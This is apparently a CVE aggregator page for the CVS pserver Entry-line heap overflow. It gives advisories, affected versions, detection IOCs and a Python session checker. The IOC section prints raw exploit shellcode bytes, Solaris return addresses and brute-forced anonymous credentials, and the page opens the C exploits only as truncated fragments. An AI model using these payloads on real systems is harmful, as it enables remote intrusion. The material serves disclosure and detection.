CVE-2004-0396
Published 2004-06-14
Priority: P2 · 62 · high · CVSS 2.0 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit: available
EPSS: 67.53% (99.2nd percentile)
Heap-based buffer overflow in CVS 1.11.x up to 1.11.15, and 1.12.x up to 1.12.7, when using the pserver mechanism allows remote attackers to execute arbitrary code via Entry lines.
Affected (7 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cvs | cvs | — | — |
| cvs | cvs | — | — |
| cvs | cvs | >= 0 < 1:1.12.5-6 | 1:1.12.5-6 |
| cvs | cvs | >= 0 < 1:1.12.5-6 | 1:1.12.5-6 |
| cvs | cvs | >= 0 < 1:1.12.5-6 | 1:1.12.5-6 |
| cvs | cvs | >= 0 < 1:1.12.5-6 | 1:1.12.5-6 |
| debian | cvs | < cvs 1:1.12.5-6 (bookworm) | cvs 1:1.12.5-6 (bookworm) |
Detection & IOCs (extracted from sources)
Shellcode bytes (extracted from the Linux/FreeBSD exploit):
\xeb\x15\x42\x4c\x34\x43\x4b\x48\x34\x37\x20\x34\x20\x4c\x31\x46\x33\x20\x42\x52\x4f\x21\x0a\x31\xc0\x50\x68\x78\x79\x6f\x75\x68\x61\x62\x72\x6f\x89\xe1\x6a\x08\x5a\x31\xdb\x43\x6a\x04\x58\xcd\x80\x6a\x17\x58\x31\xdb\xcd\x80\x31\xd2\x52\x68\x2e\x2e\x72\x67\x58\x05\x01\x01\x01\x01\x50\xeb\x12\x4c\x45\x20\x54\x52\x55\x43\x20\x43\x48\x45\x4c\x4f\x55\x20\x49\x43\x49\x68\x2e\x62\x69\x6e\x58\x40\x50\x89\xe3\x52\x54\x54\x59\x6a\x0b\x58\xcd\x80\x31\xc0\x40\xcd\x80
Shellcode bytes (xx_shellcode payload, writes the '-AB-' marker):
\x6a\x1b\x58\x31\xdb\xcd\x80\x85\xc0\x74\x42\x6a\x19\x58\x50\xcd\x80\x50\x6a\x17\x58\x50\xcd\x80\x68\x2d\x41\x42\x2d\x89\xe3\x6a\x04\x58\x50\x53\x6a\x01\x50\xcd\x80\x6a\x02\x6a\x01\x50\xb0\x5a\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x50\x51\x53\x50\xb0\x3b\xcd\x80\x6a\x31\x58\xcd\x80\x93\x6a\x17\x58\xcd\x80\x6a\x04\x58\x6a\x01\x5b\x68\x2d\x41\x42\x2d\x89\xe1\x89\xc2\xcd\x80\xb0\x3f\x6a\x01\x5b\x6a\x02\x59\xcd\x80\x31\xc0\x99\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x00
Shellcode bytes (Solaris/SPARC exploit):
\x21\x18\xd8\x58\xa0\x14\x23\x61\x90\x10\x20\x01\x92\x0b\x80\x0e\x94\x10\x20\x04\x82\x10\x20\x04\x91\xd0\x20\x08\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh
- Monitor TCP port 2401 (CVS pserver) for malformed 'Entry' lines sent during authentication; the overflow is triggered via Entry lines in the pserver protocol.
- Detect exploit traffic by looking for the magic marker string 'abroxyou' in CVS pserver (TCP/2401) traffic, used by the exploit to confirm shellcode execution.
- Detect exploit traffic by looking for the marker string '-AB-' written to stdout by the xx_shellcode payload, indicating successful exploitation.
- Detect the heap-spray/normalization phase: large numbers of 'Entry' lines with repeated 0x41/0x42/0x43 fill bytes sent over CVS pserver prior to the overflow.
- The exploit uses 'Gzip-stream 1' compression negotiation immediately before triggering the overflow; detect anomalous Gzip-stream requests on CVS pserver sessions that also contain oversized Entry lines.
- The exploit brute-forces common anonymous CVS credentials (user: anonymous/anoncvs/cvs/guest; pass: empty/anonymous/anoncvs) and common cvsroot paths; alert on rapid sequential AUTH REQUEST attempts with these credentials.
- Affected versions are CVS 1.11.x through 1.11.15 and 1.12.x through 1.12.7 only; the vulnerability requires the pserver mechanism to be enabled.
- The Linux exploit (exploit-db 300) attempts OS fingerprinting before choosing between Linux and BSD exploitation paths; detection rules should cover both code paths.
- The Solaris/SPARC exploit (exploit-db 301) targets specific CVS binary offsets per version; retaddr values differ per target (e.g., 0xd4cc8 for cvs-1.11.1p1 Solaris9/SPARC, 0xd7ae8+8192 for cvs-1.12.2 Solaris9/SPARC).
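The detection heuristics listed above, combined into one session-level checker as an added example; this is not code from this page's sources or from the CVS project. It assumes a pserver session has already been reassembled into client lines (one string per protocol line), and the thresholds MAX_ENTRY_LEN, FILL_RUN_MIN and AUTH_BURST, the rule names, and the three sample sessions are constructed assumptions for the example rather than values taken from any advisory.

```python
import re

# Tunable thresholds; all three are assumptions for this example, not values from the advisory.
MAX_ENTRY_LEN = 256     # legitimate Entry lines are short path/revision records
FILL_RUN_MIN = 64       # a run of this many identical 0x41/0x42/0x43 bytes looks like heap fill
AUTH_BURST = 3          # more AUTH REQUESTs than this in one session suggests credential guessing

FILL_RUN = re.compile(r"([ABC])\1{%d,}" % (FILL_RUN_MIN - 1))
MARKERS = ("abroxyou", "-AB-")                    # exploit success markers named in the IOC list
ANON_USERS = {"anonymous", "anoncvs", "cvs", "guest"}


def rule_names(lines):
    """Return the set of rule names that fire for one reassembled pserver session."""
    return {rule for rule, _ in analyze_session(lines)}


def analyze_session(lines):
    """Walk a session's lines once and return a list of (rule, detail) findings."""
    findings = []
    oversized = fill_runs = auth_attempts = anon_attempts = 0
    gzip_seen = False

    for i, line in enumerate(lines):
        if line == "BEGIN AUTH REQUEST":
            auth_attempts += 1
            # pserver auth block layout: BEGIN, cvsroot, username, scrambled password, END
            if i + 2 < len(lines) and lines[i + 2] in ANON_USERS:
                anon_attempts += 1
        elif line.startswith("Gzip-stream"):
            gzip_seen = True
        elif line.startswith("Entry "):
            if len(line) > MAX_ENTRY_LEN:
                oversized += 1
            if FILL_RUN.search(line):
                fill_runs += 1
        for marker in MARKERS:          # markers may appear in either direction of the stream
            if marker in line:
                findings.append(("marker", "line %d contains %r" % (i, marker)))

    if oversized:
        findings.append(("oversized_entry",
                         "%d Entry lines over %d bytes" % (oversized, MAX_ENTRY_LEN)))
    if fill_runs >= 3:
        findings.append(("fill_pattern",
                         "%d Entry lines with long A/B/C fill runs" % fill_runs))
    if gzip_seen and oversized:
        findings.append(("gzip_then_oversized_entry",
                         "Gzip-stream negotiated in a session that also sends oversized Entry lines"))
    if auth_attempts > AUTH_BURST and anon_attempts >= 2:
        findings.append(("auth_bruteforce",
                         "%d AUTH REQUESTs, %d with anonymous-style users" % (auth_attempts, anon_attempts)))
    return findings


# Constructed sample sessions (client lines only), not captured traffic.
BENIGN_SESSION = [
    "BEGIN AUTH REQUEST", "/cvsroot", "anonymous", "A", "END AUTH REQUEST",
    "Root /cvsroot", "Entry /foo.c/1.1///", "Entry /bar.h/1.3///",
]

SUSPICIOUS_SESSION = [
    "BEGIN AUTH REQUEST", "/cvsroot", "anonymous", "A", "END AUTH REQUEST",
    "Root /cvsroot", "Gzip-stream 1",
    "Entry /" + "A" * 600 + "/1.1///",
    "Entry /" + "B" * 600 + "/1.1///",
    "Entry /" + "C" * 600 + "/1.1///",
]


def build_brute_session():
    """Four auth blocks cycling through common anonymous users and cvsroot paths (constructed)."""
    session = []
    for root, user in [("/cvsroot", "anonymous"), ("/cvs", "anoncvs"),
                       ("/home/cvs", "cvs"), ("/usr/local/cvsroot", "guest")]:
        session += ["BEGIN AUTH REQUEST", root, user, "A", "END AUTH REQUEST"]
    return session


if __name__ == "__main__":
    for name, session in [("benign", BENIGN_SESSION), ("suspicious", SUSPICIOUS_SESSION),
                          ("brute", build_brute_session())]:
        print(name, sorted(rule_names(session)))
```

The checker is deliberately session-scoped: the Gzip-stream and fill-pattern rules only mean something when correlated with oversized Entry lines in the same TCP/2401 connection, and the credential rule counts AUTH REQUEST blocks per session, so feed it reassembled streams rather than individual packets.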
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| osv | — | 7.5 | HIGH | — |
| vendor_debian | — | 7.5 | HIGH | — |
| vendor_redhat | — | 7.5 | HIGH | — |
Red Hat
vendor_redhat · 2004-05-19 · CVSS 7.5
CVE-2004-0396 [HIGH]: security flaw
BSD
bsd_advisories · 2004-05-19
FreeBSD-SA-04:10.cvs: CVS pserver protocol parser errors
FreeBSD-SA-04:10.cvs Security Advisory
The FreeBSD Project
Topic: CVS pserver protocol parser errors
Category: contrib
Module: contrib_cvs
Announced: 2004-05-19
Revised: 2004-05-20
Credits: Stefan Esser
Affects: All FreeBSD versions
Corrected: 2004-05-20 13:17:16 UTC (RELENG_4, 4.10-PRERELEASE)
2004-05-20 13:17:42 UTC (RELENG_4_10, 4.10-RC)
2004-05-20 13:18:08 UTC (RELENG_4_9, 4.9-RELEASE-p8)
2004-05-20 13:18:07 UTC (RELENG_4_8, 4.8-RELEASE-p21)
2004-05-20 13:18:06 UTC (RELENG_4_7, 4.7-RELEASE-p27)
2004-05-20 13:18:10 UTC (RELENG_5_2, 5.2.1-RELEASE-p7)
2004-05-20 13:18:09 UTC (RELENG_5_1, 5.1-RELEASE-p17)
2004-05-20 13:18:09 UTC (RELENG_5_0, 5.0-RELEASE-p21)
CVE Name: CAN-2004-0396
FreeBSD only: NO
For general information regarding FreeBSD Security Advisories,
including descriptions of
Debian
vendor_debian · 2004 · CVSS 7.5
CVE-2004-0396 [HIGH]: cvs - Heap-based buffer overflow in CVS 1.11.x up to 1.11.15, and 1.12.x up to 1.12.7,...
Scope: local
bookworm: resolved (fixed in 1:1.12.5-6)
bullseye: resolved (fixed in 1:1.12.5-6)
forky: resolved (fixed in 1:1.12.5-6)
sid: resolved (fixed in 1:1.12.5-6)
trixie: resolved (fixed in 1:1.12.5-6)
GHSA
ghsa_unreviewed · 2022-05-03
GHSA-qvjj-23hg-238h [HIGH]: Heap-based buffer overflow in CVS 1
OSV
osv · 2004-06-14 · CVSS 7.5
CVE-2004-0396 [HIGH]: Heap-based buffer overflow in CVS 1
No detection rules found.
Exploit-DB
exploitdb · 2004-06-25
CVE-2004-0396: CVS (Linux/FreeBSD) - Remote Entry Line Heap Overflow
---
```c
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
typedef unsigned char uchar;
void progress(void);
int brute_cvsroot(void);
int brute_username(void);
int brute_password(void);
void hdl_crashed(int);
void bsd_exploitation(void);
void try_exploit(void);
void zflush(int);
int zprintf(char *, ...);
int zgetch(void);
void start_gzip(void);
void fill_holes(void);
char * zgets(void);
void evil_entry(void);
void linux_exploitation(ulong, int);
void do_dicotomie(void);
void do_xploit(void);
char * flush_sock(void);
void usage(char *);
long getip(char *);
void try_oneshoot(void);
int connect_to_host(char *, int);
int write_sock(void *, int);
int read_sock(void *,
```
Exploit-DB
exploitdb · 2004-06-25
CVE-2004-0396: CVS - Remote Entry Line Root Heap Overflow
---
```c
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define CVS_PORT 2401
#define RET 0xffbffd20
#define NOP 0x82102017
#define ROUND(s) if (s % word_size) s += (word_size - (s % word_size))
unsigned char *root;
unsigned char *user;
unsigned char *pass;
unsigned char *scrambled;
unsigned char *reposit;
unsigned char *directory;
unsigned char buf[512];
unsigned char *host;
unsigned int rport, port;
unsigned int target;
z_stream zout;
z_stream zin;
unsigned char zbuf[65536 * 4];
unsigned int zbufpos, zsent = 0;
unsigned int word_size = 8, fill_size;
unsigned int len1, len2, len3;
unsigned int oflip, change, retaddr;
char entry1[64], entry2[64], entry3[64];
struct exp
```
References
- ftp://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2004-008.txt.asc
- ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-04:10.cvs.asc
- http://archives.neohapsis.com/archives/fulldisclosure/2004-05/0980.html
- http://cert.uni-stuttgart.de/archive/bugtraq/2004/05/msg00219.html
- http://lists.grok.org.uk/pipermail/full-disclosure/2004-May/021742.html
- http://marc.info/?l=bugtraq&m=108498454829020&w=2
- http://marc.info/?l=bugtraq&m=108500040719512&w=2
- http://marc.info/?l=bugtraq&m=108636445031613&w=2
- http://marc.info/?l=openbsd-security-announce&m=108508894405639&w=2
- http://secunia.com/advisories/11641
- http://secunia.com/advisories/11647
- http://secunia.com/advisories/11651
- http://secunia.com/advisories/11652
- http://secunia.com/advisories/11674
- http://security.e-matters.de/advisories/072004.html
- http://security.gentoo.org/glsa/glsa-200405-12.xml
- http://www.ciac.org/ciac/bulletins/o-147.shtml
- http://www.debian.org/security/2004/dsa-505
- http://www.kb.cert.org/vuls/id/192038
- http://www.mandriva.com/security/advisories?name=MDKSA-2004:048
- http://www.osvdb.org/6305
- http://www.redhat.com/support/errata/RHSA-2004-190.html
- http://www.securityfocus.com/bid/10384
- http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.395865
- http://www.us-cert.gov/cas/techalerts/TA04-147A.html
- https://exchange.xforce.ibmcloud.com/vulnerabilities/16193
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9058
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A970